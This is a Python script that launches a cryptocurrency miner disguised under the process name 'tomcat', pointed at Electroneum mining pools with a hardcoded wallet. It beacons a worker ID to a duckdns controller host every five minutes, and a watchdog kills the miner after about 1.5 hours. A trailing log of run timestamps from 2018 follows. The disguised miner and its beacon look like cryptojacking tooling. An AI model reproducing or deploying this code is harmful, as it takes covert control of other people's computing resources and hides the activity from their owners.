import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:04.949655
#2018-02-17 16:22:01.472272
#2018-02-17 18:09:03.787204
#2018-02-17 19:57:01.796958
#2018-02-17 21:45:04.434793
#2018-02-17 23:29:03.899632
#2018-02-18 01:18:08.126000
#2018-02-18 03:05:08.061201
#2018-02-18 04:53:04.782256
#2018-02-18 06:43:06.746549
#2018-02-18 08:33:04.067803
#2018-02-18 10:20:01.428622
#2018-02-18 12:06:05.199341
#2018-02-18 13:51:06.389865
#2018-02-18 15:43:06.559406
#2018-02-18 17:33:01.261514
#2018-02-18 19:19:06.630613
#2018-02-18 21:05:07.919730
#2018-02-18 22:52:06.756992
#2018-02-19 00:39:06.144298
#2018-02-19 02:25:08.610697
#2018-02-19 04:12:01.365854
#2018-02-19 05:56:01.430033
#2018-02-19 07:45:09.170477
#2018-02-19 09:34:07.173471
#2018-02-19 11:25:01.293264
#2018-02-19 13:11:07.846190
#2018-02-19 14:59:09.291970
#2018-02-19 16:48:10.265526
#2018-02-19 18:34:02.775832
#2018-02-19 20:19:02.226316
#2018-02-19 22:08:01.332754
#2018-02-19 23:54:01.629227
#2018-02-20 01:40:01.687900
#2018-02-20 03:28:04.725508
#2018-02-20 05:15:08.665205
#2018-02-20 06:59:02.178885
#2018-02-20 08:45:08.957835
#2018-02-20 10:29:07.726264
#2018-02-20 12:14:05.556239
#2018-02-20 14:02:02.118313
#2018-02-20 15:45:10.169428
#2018-02-20 17:32:07.960394
#2018-02-20 19:20:10.866153
#2018-02-20 21:08:01.990095
#2018-02-20 22:53:06.583789
#2018-02-21 00:36:01.862632
#2018-02-21 02:23:01.988566
#2018-02-21 04:10:03.541206
#2018-02-21 05:56:07.440916
#2018-02-21 07:44:06.620425
#2018-02-21 09:31:03.700405
#2018-02-21 11:19:06.286453
#2018-02-21 13:07:07.822086
#2018-02-21 14:54:07.369405
#2018-02-21 16:42:04.740746
#2018-02-21 18:31:06.194292
#2018-02-21 20:17:02.027180
#2018-02-21 22:05:08.794053
#2018-02-21 23:51:02.036154
#2018-02-22 01:40:06.878066
#2018-02-22 03:27:07.106654
#2018-02-22 05:14:07.356647
#2018-02-22 06:58:01.275430
#2018-02-22 08:45:07.988833
#2018-02-22 10:32:07.790225
#2018-02-22 12:19:04.802259
#2018-02-22 14:03:04.378075
#2018-02-22 15:50:01.305217
#2018-02-22 17:36:13.020703
#2018-02-22 19:22:05.106965
#2018-02-22 21:14:07.739954
#2018-02-22 22:58:08.021782
#2018-02-23 00:46:06.679271
#2018-02-23 02:33:06.133749
#2018-02-23 04:22:06.655356
#2018-02-23 06:07:03.722319
#2018-02-23 07:53:07.039516
#2018-02-23 10:09:08.045092
#2018-02-23 12:03:02.003572
#2018-02-23 13:50:01.370926
#2018-02-23 15:39:08.763161
#2018-02-23 17:26:01.339645
#2018-02-23 19:11:05.166875
#2018-02-23 20:55:07.583680
#2018-02-23 22:33:04.910353
#2018-02-24 00:19:04.871677
#2018-02-24 02:09:01.473655
#2018-02-24 03:58:06.693919
#2018-02-24 05:44:06.248116
#2018-02-24 07:37:05.299671
#2018-02-24 09:22:03.430274
#2018-02-24 11:16:04.426154
#2018-02-24 13:05:08.567811
#2018-02-24 14:54:01.322038
#2018-02-24 16:44:05.643671
#2018-02-24 18:32:01.738963
#2018-02-24 20:18:03.822767
#2018-02-24 22:11:07.351525
#2018-02-25 01:08:04.853672
#2018-02-25 03:59:02.053637
#2018-02-25 07:45:06.563925